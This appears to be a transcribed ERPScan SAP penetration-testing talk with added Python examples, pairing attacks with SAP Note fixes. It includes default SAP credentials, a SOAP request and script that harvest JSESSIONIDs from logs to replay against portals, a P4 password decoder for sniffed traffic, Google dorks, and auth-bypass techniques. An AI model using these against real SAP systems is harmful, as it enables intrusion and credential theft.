ICM (critical services)
• Service /sap/public/icf_info/icr_urlprefix – installed applications
DEMO 17: ITS information disclosure by ERPScan Pentesting Tool
Default credentials
They can be used to run RFC functions remotely.

| USER | PASSWORD | CLIENT |
|---|---|---|
| SAP* | 06071992, PASS | 000, 001, 066, custom |
| DDIC | 19920706 | 000, 001, custom |
| TMSADM | PASSWORD, $1Pawd2& | 000 |
| SAPCPIC | ADMIN | 000, 001 |
| EARLYWATCH | SUPPORT | 066 |
ICM (critical services)
• Critical service /sap/bc/soap/rfc
• RFC functions are mapped to RFC authorization groups
• Security of standard SOAP RFC calls:
– The user must have S_RFC authorization for the group of RFC functions to execute any call in this group
– The user must have the authorizations that are checked inside the RFC function to execute it
– Many RFC functions don't have any special authorization checks, so every user can call them via SOAP RFC
DEMO 18: SOAP RFCs by ERPScan Pentesting Tool
ICM service defense: other
• Disable or configure a customized HTTP server header for ICM (SAP Note 1329326)
• Disable or configure disclosure of the hidden version (SAP Note 747818)
• Disable services that are not necessary (SAP Note 1498575)
• Configure ICF authorization for enabled services
• Change default passwords
SAP Management Console security

SAP NetWeaver architecture (diagram showing the MMC service and SAPHostControl)
SAP MMC - overview
• MMC (sapstartsrv) is installed by default on port 5NN13 (NN = instance number)
• Used for remote management of SAP servers
• Commands are executed via a SOAP interface
• By default SSL is not configured
• The administration password is transmitted with HTTP basic auth (base64)
• By sniffing this password we can get full control over the server
SAP MMC attacks
• Many attacks can be carried out without authentication
• Attacks are realized by sending SOAP requests
• Mostly information disclosure and denial of service
• Also OS command execution
• All MMC attacks are implemented in the ERPScan Pentesting Tool
SAP MMC attacks
ERPScan Pentesting Tool modules:
• GET_VERSION_gSOAP.pl – obtains the SAP NetWeaver version
• GET_ENV_gSOAP.pl – obtains the list of SAP parameters
• LIST_LOGS_gSOAP.pl – shows the list of log files that can be obtained
• LIST_TRACE_gSOAP.pl – shows the list of trace files that can be obtained remotely
• GET_LOGS_gSOAP.pl – shows log file details
• GET_TRACE_gSOAP.pl – shows trace file details
Advanced MMC attacks
• SAP MMC provides a common framework for centralized system management
• It allows reading the trace and log messages
• The file userinterface.log can store JSESSIONID values if tracing is on
• Using a JSESSIONID from the logs, an attacker can log into the SAP Portal
Advanced MMC attacks
Request that reads userinterface.log through the sapstartsrv ReadLogFile method (%COUNT% is the tool's placeholder for the number of entries):

    <?xml version="1.0"?>
    <SOAP-ENV:Envelope xmlns:SOAP-ENV="http://schemas.xmlsoap.org/soap/envelope/"
                       xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance"
                       xmlns:xs="http://www.w3.org/2001/XMLSchema">
      <SOAP-ENV:Header>
        <sapsess:Session xmlns:sapsess="http://www.sap.com/webas/630/soap/features/session/">
          <enableSession>true</enableSession>
        </sapsess:Session>
      </SOAP-ENV:Header>
      <SOAP-ENV:Body>
        <ns1:ReadLogFile xmlns:ns1="urn:SAPControl">
          <filename>j2ee/cluster/server0/log/system/userinterface.log</filename>
          <filter/>
          <language/>
          <maxentries>%COUNT%</maxentries>
          <statecookie>EOF</statecookie>
        </ns1:ReadLogFile>
      </SOAP-ENV:Body>
    </SOAP-ENV:Envelope>
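An added example, not the ERPScan tool nor SAP code, that serves two slides: the /sap/bc/soap/rfc critical service (calling RFC_SYSTEM_INFO, one of the functions listed under anonymous RFCs) and the sapstartsrv ReadLogFile request above. It builds both envelopes with the standard library and parses constructed sample responses: the RFCSI_EXPORT fields from the RFC call and the JSESSIONID values from userinterface.log lines. The endpoint paths, method name, session header and file name come from the slides; the SOAP RFC namespace is the one SAP's SOAP RFC WSDL uses; the sample responses, the post_soap helper and the session-ID pattern are this example's assumptions.

```python
import base64
import re
import urllib.request
import xml.etree.ElementTree as ET
from xml.sax.saxutils import escape

SOAP_NS = "http://schemas.xmlsoap.org/soap/envelope/"
RFC_NS = "urn:sap-com:document:sap:rfc:functions"   # namespace of the ICF SOAP RFC handler


def soap_envelope(body_xml, header_xml=""):
    """Wrap a body (and optional header) fragment in a SOAP 1.1 envelope."""
    header = "<SOAP-ENV:Header>%s</SOAP-ENV:Header>" % header_xml if header_xml else ""
    return ('<?xml version="1.0"?><SOAP-ENV:Envelope xmlns:SOAP-ENV="%s">%s'
            '<SOAP-ENV:Body>%s</SOAP-ENV:Body></SOAP-ENV:Envelope>' % (SOAP_NS, header, body_xml))


def soap_rfc_request(function_name, **params):
    """Body for /sap/bc/soap/rfc: the element is the function module, children are import parameters."""
    args = "".join("<%s>%s</%s>" % (k, escape(str(v)), k) for k, v in params.items())
    return soap_envelope('<ns1:%s xmlns:ns1="%s">%s</ns1:%s>' % (function_name, RFC_NS, args, function_name))


def sapcontrol_readlogfile_request(filename, maxentries=1000):
    """The sapstartsrv ReadLogFile request from the slide, with a concrete entry count."""
    header = ('<sapsess:Session xmlns:sapsess="http://www.sap.com/webas/630/soap/features/session/">'
              '<enableSession>true</enableSession></sapsess:Session>')
    body = ('<ns1:ReadLogFile xmlns:ns1="urn:SAPControl"><filename>%s</filename><filter/><language/>'
            '<maxentries>%d</maxentries><statecookie>EOF</statecookie></ns1:ReadLogFile>'
            % (escape(filename), maxentries))
    return soap_envelope(body, header)


def post_soap(url, envelope, user=None, password=None, soap_action=""):
    """Send an envelope; basic auth is exactly the base64 header the MMC slides say is sniffable.
    Not exercised offline; assumed helper."""
    req = urllib.request.Request(url, data=envelope.encode(), method="POST")
    req.add_header("Content-Type", "text/xml; charset=utf-8")
    req.add_header("SOAPAction", soap_action)
    if user is not None:
        req.add_header("Authorization", "Basic " + base64.b64encode(("%s:%s" % (user, password)).encode()).decode())
    with urllib.request.urlopen(req, timeout=10) as resp:
        return resp.read().decode("utf-8", "replace")


def parse_rfc_system_info(response_xml):
    """Collect the leaf RFC* fields of RFCSI_EXPORT from an RFC_SYSTEM_INFO response, namespace-agnostic."""
    info = {}
    for el in ET.fromstring(response_xml).iter():
        tag = el.tag.rsplit("}", 1)[-1]
        if tag.startswith("RFC") and not list(el) and el.text:
            info[tag] = el.text.strip()
    return info


# SAP Java session IDs look like "(J2EE...)ID...End"; capture until whitespace, ';' or '#'.
JSESSIONID_RE = re.compile(r"JSESSIONID=([^\s;#]+)")


def extract_session_ids(readlogfile_response_xml):
    """Distinct JSESSIONID values appearing anywhere in the text of a ReadLogFile response."""
    seen = []
    for el in ET.fromstring(readlogfile_response_xml).iter():
        for sid in JSESSIONID_RE.findall(el.text or ""):
            if sid not in seen:
                seen.append(sid)
    return seen


# Constructed responses (not captured from a real system) in the shape the two services return.
SAMPLE_RFC_SYSTEM_INFO_RESPONSE = """<SOAP-ENV:Envelope xmlns:SOAP-ENV="http://schemas.xmlsoap.org/soap/envelope/">
<SOAP-ENV:Body><urn:RFC_SYSTEM_INFO.Response xmlns:urn="urn:sap-com:document:sap:rfc:functions">
<RFCSI_EXPORT><RFCPROTO>011</RFCPROTO><RFCHOST>erpapp01</RFCHOST><RFCSYSID>ERP</RFCSYSID>
<RFCDBHOST>erpdb01</RFCDBHOST><RFCDBSYS>ORACLE</RFCDBSYS><RFCSAPRL>702</RFCSAPRL>
<RFCOPSYS>Linux</RFCOPSYS><RFCIPADDR>172.16.0.222</RFCIPADDR><RFCKERNRL>720</RFCKERNRL>
</RFCSI_EXPORT></urn:RFC_SYSTEM_INFO.Response></SOAP-ENV:Body></SOAP-ENV:Envelope>"""

SAMPLE_READLOGFILE_RESPONSE = """<SOAP-ENV:Envelope xmlns:SOAP-ENV="http://schemas.xmlsoap.org/soap/envelope/">
<SOAP-ENV:Body><ns1:ReadLogFileResponse xmlns:ns1="urn:SAPControl"><fields>
<item>#2.0#2012 03 01 10:15:22#/System/UserInterface##Session JSESSIONID=(J2EE1234500)ID0123456789DB01234567890End user=Administrator#</item>
<item>#2.0#2012 03 01 10:16:01#/System/UserInterface##Session JSESSIONID=(J2EE1234500)ID0123456789DB01234567890End user=Administrator#</item>
<item>#2.0#2012 03 01 10:20:45#/System/UserInterface##Session JSESSIONID=(J2EE1234500)ID9876543210DB09876543210End user=j.doe#</item>
</fields></ns1:ReadLogFileResponse></SOAP-ENV:Body></SOAP-ENV:Envelope>"""
```

Against a live system the RFC call goes to `http://host:8000/sap/bc/soap/rfc?sap-client=800` with one of the default accounts from the table, and the ReadLogFile call to `http://host:5NN13/` with no credentials unless service/protectedwebmethods covers it; each recovered JSESSIONID is tried as a cookie against the portal.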
DEMO 19: SAP MMC attacks by ERPScan Pentesting Tool
SAP MMC - defense
• Install SAP Note 927637
• Install SAP Note 1439348 – information disclosure in MMC
• Install SAP Note 1469804 – potential DoS in sapstartsrv
• Don't use TRACE_LEVEL = 3 in production systems
• Delete traces
• Disable methods: service/protectedwebmethods = SDEFAULT
• Disable access from untrusted IPs: service/http/acl_file and service/https/acl_file
http://help.sap.com/saphelp_nwpi71/helpdata/en/d6/49543b1e49bc1fe10000000a114084/frameset.htm
SAP HostControl security

SAP NetWeaver architecture (diagram showing the MMC service and SAPHostControl)
SAPHostControl
• The service listens on port 1128/tcp
• Very similar to MMC
• Many attacks can be carried out without authentication
• Attacks are realized by sending SOAP requests
• Vulnerability in the GetDatabaseStatus function: its parameters are passed to the dbmcli executable
• SAP MaxDB only
DEMO 21: SAP HostControl command injection by ERPScan Pentesting Tool
Defense
• Install SAP Note 1341333 – command injection
• Disable access from untrusted IPs
SAP NetWeaver J2EE security

SAP NetWeaver architecture (diagram)
J2EE Engine
Many SAP systems don't use the ABAP stack
• Automation of business processes (ERP, PLM, CRM, SRM) is based on ABAP.
• Integration, collaboration and management are based on the J2EE engine:
– SAP Portal
– SAP PI
– SAP XI
– SAP Mobile Infrastructure
– SAP Solution Manager
J2EE Platform Architecture (diagram)
J2EE Platform services

| Service name | Port number | Default value | Range (min-max) |
|---|---|---|---|
| Enqueue server | 32NN | 3201 | 3200-3299 |
| HTTP | 5NN00 | 50000 | 50000-59900 |
| HTTP over SSL | 5NN01 | 50001 | 50001-59901 |
| IIOP | 5NN07 | 50007 | 50007-59907 |
| IIOP Initial Context | 5NN02 | 50002 | 50002-59902 |
| IIOP over SSL | 5NN03 | 50003 | 50003-59903 |
| P4 | 5NN04 | 50004 | 50004-59904 |
| P4 over HTTP | 5NN05 | 50005 | 50005-59905 |
| P4 over SSL | 5NN06 | 50006 | 50006-59906 |
| Telnet | 5NN08 | 50008 | 50008-59908 |
| LogViewer control | 5NN09 | 50009 | 50009-59909 |
| JMS | 5NN10 | 50010 | 50010-59910 |
SAP J2EE Services
• General services
– SAP Visual Admin (P4)
– SAP NetWeaver HTTP (web server)
• Additional services
– SAP Portal
– SAP SDM
– SAP SDM Admin
– SAP LogViewer
– SAP J2EE Telnet
SAP Security storage
• The SAP J2EE Engine stores the database user SAP<SID>DB and all configurations in a specific file
• The J2EE Engine uses the SAP Java Cryptography Toolkit to encrypt the contents of the secure store with the Triple DES algorithm
• \usr\sap\<SID>\SYS\global\security\data\SecStore.properties
config.properties

    rdbms.maximum_connections=5
    system.name=TTT
    secstorefs.keyfile=/oracle/TTT/sapmnt/global/security/data/SecStore.key
    secstorefs.secfile=/oracle/TTT/sapmnt/global/security/data/SecStore.properties
    secstorefs.lib=/oracle/TTTsapmnt/global/security/lib
    rdbms.driverLocation=/oracle/client/10x_64/instantclient/ojdbc14.jar
    rdbms.connection=jdbc/pool/TTT
    rdbms.initial_connections=1
secstore.properties

    $internal/version=Ni4zFF4wMSeaseforCCMxegAfx
    admin/host/TTT=7KJuOPPs/+u+14jM7uy7cy7exrZuYvevkSrPxwueur2445yxgBS
    admin/password/TTT=7KJuOPPs/+uv+14j56vDc7M7v7dytbGbkgqDp+QD04b0Fh
    jdbc/pool/TTT=7KJuOPPs/+u5jM6s1cvvgQ1gzFvarxuUzEJTHTJI0VGegH
    admin/port/TTT=7KJuOPPs/+u+1j4vD1cv6ZTvd336rzEd7267Rwr4ZUgRTQ
    $internal/check=BJRrzfjeUA+bw4XCzdz16zX78ufbt
    $internal/mode=encrypted
    admin/user/TTT=7KJuOPPs/+u+14j6s14sTxXU3ONl3rL6N7yssV75eC
Profit
• We have an encrypted password
• We have the key to decrypt it
• We get the J2EE_ADMIN and JDBC passwords!
Prevention
• Install SAP Note 1619539
• Restrict read access to the files SecStore.properties and SecStore.key
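An added example, not from the deck, for the second prevention point: it reads the secstorefs.keyfile and secstorefs.secfile paths out of config.properties (the keys shown on the slide) and flags either file if it is readable by group or others, owned by an unexpected user, or missing. make_sample_store builds a throwaway layout with constructed contents so the check runs anywhere; the real files live under the path given above. POSIX permission bits only.

```python
import os
import stat
import tempfile


def parse_config_properties(text):
    """Minimal Java .properties reader (key=value, '#'/'!' comments) for the keys on the slide."""
    props = {}
    for raw in text.splitlines():
        line = raw.strip()
        if not line or line.startswith(("#", "!")) or "=" not in line:
            continue
        key, value = line.split("=", 1)
        props[key.strip()] = value.strip()
    return props


def secstore_paths(props):
    """Key file and encrypted store, exactly the two files the prevention slide says to protect."""
    return props["secstorefs.keyfile"], props["secstorefs.secfile"]


def exposed_files(paths, owner_uid=None):
    """(path, reason) for every file readable by group/others, owned by the wrong uid, or missing."""
    findings = []
    for path in paths:
        try:
            st = os.stat(path)
        except FileNotFoundError:
            findings.append((path, "missing"))
            continue
        if st.st_mode & (stat.S_IRGRP | stat.S_IROTH):
            findings.append((path, "readable by group/others (mode %o)" % stat.S_IMODE(st.st_mode)))
        if owner_uid is not None and st.st_uid != owner_uid:
            findings.append((path, "owned by uid %d, expected %d" % (st.st_uid, owner_uid)))
    return findings


def audit_secstore(config_text, owner_uid=None):
    """Parse config.properties text and audit the two secure-store files it points at."""
    return exposed_files(secstore_paths(parse_config_properties(config_text)), owner_uid)


def make_sample_store(key_mode=0o600, sec_mode=0o644):
    """Demo fixture: create dummy SecStore.key / SecStore.properties with the given modes in a
    temp directory and return a constructed config.properties pointing at them."""
    d = tempfile.mkdtemp(prefix="secstore-demo-")
    key = os.path.join(d, "SecStore.key")
    sec = os.path.join(d, "SecStore.properties")
    for path, mode in ((key, key_mode), (sec, sec_mode)):
        with open(path, "w") as f:
            f.write("# dummy content, not a real secure store\n")
        os.chmod(path, mode)
    return ("system.name=TTT\nsecstorefs.keyfile=%s\nsecstorefs.secfile=%s\n"
            "secstorefs.lib=%s/lib\nrdbms.connection=jdbc/pool/TTT\n" % (key, sec, d))


if __name__ == "__main__":
    for path, reason in audit_secstore(make_sample_store()):
        print("%s: %s" % (path, reason))
```

On a real host, feed it the config.properties under the J2EE instance directory and pass the uid of &lt;sid&gt;adm as owner_uid; a store file that any local account can read is equivalent to a cleartext J2EE_ADMIN and database password, which is the "profit" slide above.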
SAP Visual Admin security

SAP VisualAdmin
• SAP Visual Admin – remote tool for controlling the J2EE Engine
• Uses the P4 protocol – SAP's proprietary protocol
• By default all data is transmitted in cleartext
• P4 can be configured to use SSL to prevent MITM
• Passwords are transmitted with some sort of "encryption"
• In reality it is a simple reversible transform with a known, hard-coded key
SAP VisualAdmin data (screenshot of captured P4 traffic)
Insecure password encryption in P4
Decompiled from the P4 client library (decompiler line numbers stripped; the enclosing method signature is not on the slide and is assumed here):

    static char[] encodePassword(char[] data) {
        char mask = 43690;   // 0xAAAA: the hard-coded "key"
        char check = 21845;  // 0x5555: the hard-coded check constant
        char[] result = new char[data.length + 1];

        // Running XOR: each output char is the XOR of the previous output and the input char,
        // so a listener who knows the constant recovers the input with one XOR per char.
        for (int i = 0; i < data.length; ++i) {
            mask = (char)(mask ^ data[i]);
            result[i] = mask;
        }
        // Trailing "checksum" char derived from the last output and the constant.
        result[data.length] = (char)(mask ^ check);

        return result;
    }
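The same routine in Python, added here (not from the slides or the P4 library) together with its inverse, to make the point concrete: because mask and check are constants compiled into the client, anyone who captures the P4 stream recovers the password with one XOR per character. The constants are the ones in the decompiled code; treating the transmitted value as a list of 16-bit words is this example's simplification of the wire format.

```python
MASK = 0xAAAA    # 43690 in the decompiled code
CHECK = 0x5555   # 21845 in the decompiled code


def p4_obfuscate(password, mask=MASK, check=CHECK):
    """Port of the P4 routine: running XOR over 16-bit chars plus a trailing check word."""
    out = []
    for ch in password:
        mask = (mask ^ ord(ch)) & 0xFFFF
        out.append(mask)
    out.append((mask ^ check) & 0xFFFF)
    return out


def p4_deobfuscate(words, mask=MASK, check=CHECK):
    """Invert it from a captured stream: plaintext[i] = words[i] ^ words[i-1], with words[-1]
    being the initial mask. The trailer must equal last_word ^ check, which also tells a
    sniffer that it has a P4-encoded password rather than other traffic."""
    if not words:
        raise ValueError("empty stream")
    body, trailer = words[:-1], words[-1]
    prev = mask
    chars = []
    for w in body:
        chars.append(chr((w ^ prev) & 0xFFFF))
        prev = w
    if (prev ^ check) & 0xFFFF != trailer:
        raise ValueError("check word mismatch: corrupted or not a P4-encoded password")
    return "".join(chars)


def p4_from_hex(dump):
    """Convenience for a hex dump of 16-bit big-endian words copied out of a packet capture."""
    raw = bytes.fromhex(dump.replace(" ", ""))
    if len(raw) % 2:
        raise ValueError("odd number of bytes")
    return [int.from_bytes(raw[i:i + 2], "big") for i in range(0, len(raw), 2)]
```

Note what the check word does not do: it is not a MAC, so an on-path attacker can also re-encode a different password of their choosing; SSL on P4, as the next slide says, is the only fix.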
Defense
• Use SSL for securing all data transmitted between server-server and server-client connections
http://help.sap.com/saphelp_nwpi71/helpdata/de/14/ef2940cbf2195de10000000a1550b0/content.htm
SAP NetWeaver HTTP security

SAP Google dorks
SAP HTTP services can easily be found on the internet:
• inurl:/irj/portal
• inurl:/IciEventService sap
• inurl:/IciEventService/IciEventConf
• inurl:/wsnavigator/jsps/test.jsp
• inurl:/irj/go/km/docs/
Information disclosure
• Kernel or application release and SP version: ERPSCAN-11-023, ERPSCAN-11-027, DSECRG-00208
• Application logs and traces: DSECRG-00191, DSECRG-00232
• Username: ERPSCAN-00231
• Internal port scanning, internal user brute force: ERPSCAN-11-032, DSECRG-00175
![Page 133: Prac%cal’SAP’ Pentesng · 2016-12-30 · Invest’in’security’ to’secure’investments’ Prac%cal’SAP’ Pentesng! Alexander!Polyakov.CTO ERPScan!](https://reader035.fdocuments.net/reader035/viewer/2022070917/5fb73094ebcf5432554158f7/html5/thumbnails/133.jpg)
Informa%on disclose
133
![Page 134: Prac%cal’SAP’ Pentesng · 2016-12-30 · Invest’in’security’ to’secure’investments’ Prac%cal’SAP’ Pentesng! Alexander!Polyakov.CTO ERPScan!](https://reader035.fdocuments.net/reader035/viewer/2022070917/5fb73094ebcf5432554158f7/html5/thumbnails/134.jpg)
Information disclosure
User disclosure: ERPSCAN-00231
Internal port scan: ERPSCAN-11-032
(Screenshot: the application's responses differ for "Host is not alive", "Port closed", "HTTP port" and "SAP port".)
Prevention
• Install SAP notes 1548548, 1545883, 1503856, 948851, 1545883
• Apply the latest SAP notes every month
• Disable unnecessary applications
Authentication
• Declarative authentication:
- The Web container (J2EE Engine) handles authentication
- Example: J2EE Web applications
• Programmatic authentication:
- Components running on the J2EE Engine authenticate directly against the User Management Engine (UME) using the UME API
- Example: Web Dynpro, Portal iViews
Declarative authentication
The WEB.XML file is stored in the WEB-INF directory of the application root.

```xml
<security-constraint>
  <web-resource-collection>
    <web-resource-name>Restrictedaccess</web-resource-name>
    <url-pattern>/admin/*</url-pattern>
    <!-- only DELETE on /admin/* requires the admin role -->
    <http-method>DELETE</http-method>
  </web-resource-collection>
  <auth-constraint>
    <role-name>admin</role-name>
  </auth-constraint>
</security-constraint>
```
Invoker servlet
• Functionality for quickly calling servlets by their class name
• Makes it possible to call any servlet of an application, even one not declared in WEB.XML
• Called directly through the /servlet/ directory followed by the class name
• For example: /servlet/com.sap.admin.Critical.Action
Invoker servlet auth bypass

```xml
<servlet>
  <servlet-name>CriticalAction</servlet-name>
  <servlet-class>com.sap.admin.Critical.Action</servlet-class>
</servlet>
<servlet-mapping>
  <servlet-name>CriticalAction</servlet-name>
  <url-pattern>/admin/critical</url-pattern>
</servlet-mapping>
<!-- the constraint protects /admin/*, not the invoker path
     /servlet/com.sap.admin.Critical.Action -->
<security-constraint>
  <web-resource-collection>
    <web-resource-name>Restrictedaccess</web-resource-name>
    <url-pattern>/admin/*</url-pattern>
    <http-method>GET</http-method>
  </web-resource-collection>
  <auth-constraint>
    <role-name>admin</role-name>
  </auth-constraint>
</security-constraint>
```
Prevention
• Install the latest updates
• Disable the feature by setting the "EnableInvokerServletGlobally" property of the servlet_jsp service on the server nodes to "false"
• To enable the invoker servlet for selected applications, see SAP Note 1445998
• For SAP NetWeaver Portal, see SAP Note 1467771
DEMO 24: SAP NetWeaver J2EE invoker servlet unauthorized file read
DEMO 25: SAP NetWeaver J2EE invoker servlet file read + secstore decrypt
Verb Tampering

```xml
<security-constraint>
  <web-resource-collection>
    <web-resource-name>Restrictedaccess</web-resource-name>
    <url-pattern>/admin/*</url-pattern>
    <!-- only GET is restricted; other verbs are not covered -->
    <http-method>GET</http-method>
  </web-resource-collection>
  <auth-constraint>
    <role-name>admin</role-name>
  </auth-constraint>
</security-constraint>
```

What if HEAD is used instead of GET?
Verb Tampering example: auth bypass
• Administrative interface for managing the J2EE engine (CTC)
• Can be accessed remotely
• Can run user management actions:
- Create new users
- Assign them to any roles
- Execute OS commands on the server side
- Create RFC destinations
- Read RFC destination info
This means that an attacker gets full access to SAP and the OS.
DEMO 26: SAP NetWeaver J2EE verb tampering user creation
Prevention
• Install SAP notes 1503579, 1616259
• Scan applications using the ERPScan WEB.XML check tool or manually
• Secure WEB.XML by deleting all <http-method> elements
• Disable applications that are not necessary
SAP NetWeaver Portal Security
SAP Portal
• Point of web access to SAP systems
• Point of web access to other corporate systems
• A way for attackers to reach SAP from the Internet
• ~1000 Portals in the world, according to Shodan
• ~200 Portals in the world, according to Google
Portal issues
• SAP implements SSO using the Header Variable Login Module
(Diagram: the attacker supplies the header_auth header; the portal performs the credentials check, answers okay and returns a session cookie.)
Knowledge Management
• One of the Portal modules is SAP Knowledge Management
• KM is additional functionality
• It is designed to aggregate all user documents and create a knowledge base
• Similar to SharePoint
• An attacker can:
– Get read access to critical documents
– Create phishing pages that steal logins and passwords
KM Documents
• KM can be found by default at /irj/go/km/navigation
• Sometimes the Guest user has access to KM
• You can test the listed folders:
– /irj/go/km/navigation/userhome/
– /irj/go/km/navigation/docs/
– /irj/go/km/navigation/documents/Public Documents/
– /irj/go/km/navigation/Entry Points/Public Documents/
KM Documents
• Sometimes it is possible to put documents into shared folders
• For example the folder /irj/go/km/docs/documents/Public Documents/
• An HTML file with a login sniffer or cookie sniffer can be uploaded there
SAP Security
Questions?
We devote attention to the requirements of our customers and prospects, and constantly improve our product. If you believe that our scanner lacks a particular function, you can e-mail us or give us a call. We will be glad to consider your suggestions for the next releases or monthly updates.
web: www.erpscan.com e-mail: [email protected], [email protected]
Conclusion